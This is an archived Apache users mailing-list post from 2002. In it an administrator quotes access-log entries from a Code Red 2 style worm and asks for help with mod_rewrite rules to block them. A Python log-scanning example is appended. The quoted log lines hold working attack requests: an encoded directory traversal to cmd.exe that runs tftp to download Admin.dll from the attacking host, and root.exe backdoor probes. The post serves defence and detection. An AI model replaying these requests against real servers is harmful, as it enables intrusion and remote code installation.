httpd-users mailing list archives

From Bill -OSX- Jones <sn...@mac.com>
Subject Re: Code Red 2 attack
Date Thu, 28 Feb 2002 23:24:11 GMT
Here's an example -

207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"

... 72 practically identical lines deleted ...

207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"

...

But I still feel warm and snuggly inside  :)

Anyhow, earlier I posted a mod_rewrite question that went by 
somewhat unnoticed, so please allow me to try once more -- then if 
no one responds I will go back into my semi-annual hibernation  :)

I want to test for
RewriteCond %{REQUEST_FILENAME} \.ida.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.com.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.exe.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.dll.+$ [NC]
RewriteRule ^.*$ http://insecurity.org/403.shtml [L]

Which apparently works, but it seems that this typical section of 
the CR2 request:  /..%252f../  as denoted within -
207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"

is somehow causing the match to fail and not match.


		Any thoughts?
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
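
Added example, not part of the original message: an offline check that flags the request patterns quoted above in an Apache access log by splitting off the query string, percent-decoding the path until it stops changing, and then testing for traversal sequences and the same extensions the RewriteCond lines list. The first three sample lines are the ones from the message with the mail wrapping rejoined; the 192.0.2.10 line and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# First three lines: as quoted in the message (mail wrapping rejoined).
# Last line: constructed benign request for contrast.
SAMPLE_LOG = r'''207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"
192.0.2.10 - - [28/Feb/2002:02:40:01 -0500] "GET /docs/index.html HTTP/1.0" 200 5120 "-" "-"
'''

# Apache access-log line: client, method, target, protocol, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*) (HTTP/[\d.]+)" (\d{3}) ')
# Same extensions the RewriteCond lines in the message test for.
EXT_RE = re.compile(r'\.(?:ida|com|exe|dll)$', re.I)

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable; return (decoded, rounds that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line):
    """Return (client, status, decoded_path, flags), or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _method, target, _proto, status = m.groups()
    path = target.partition("?")[0]  # query string is not part of the path
    decoded, rounds = fully_decode(path)
    flags = []
    if rounds > 1:  # e.g. %252f -> %2f -> /
        flags.append("double-encoded")
    if "../" in decoded or "..\\" in decoded:
        flags.append("traversal")
    if EXT_RE.search(decoded):
        flags.append("executable")
    return client, int(status), decoded, flags

def scan(log_text):
    """Keep only the lines that raised at least one flag."""
    hits = (classify(line) for line in log_text.splitlines())
    return [h for h in hits if h and h[3]]

if __name__ == "__main__":
    for client, status, path, flags in scan(SAMPLE_LOG):
        print(client, status, ",".join(flags), repr(path))
```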

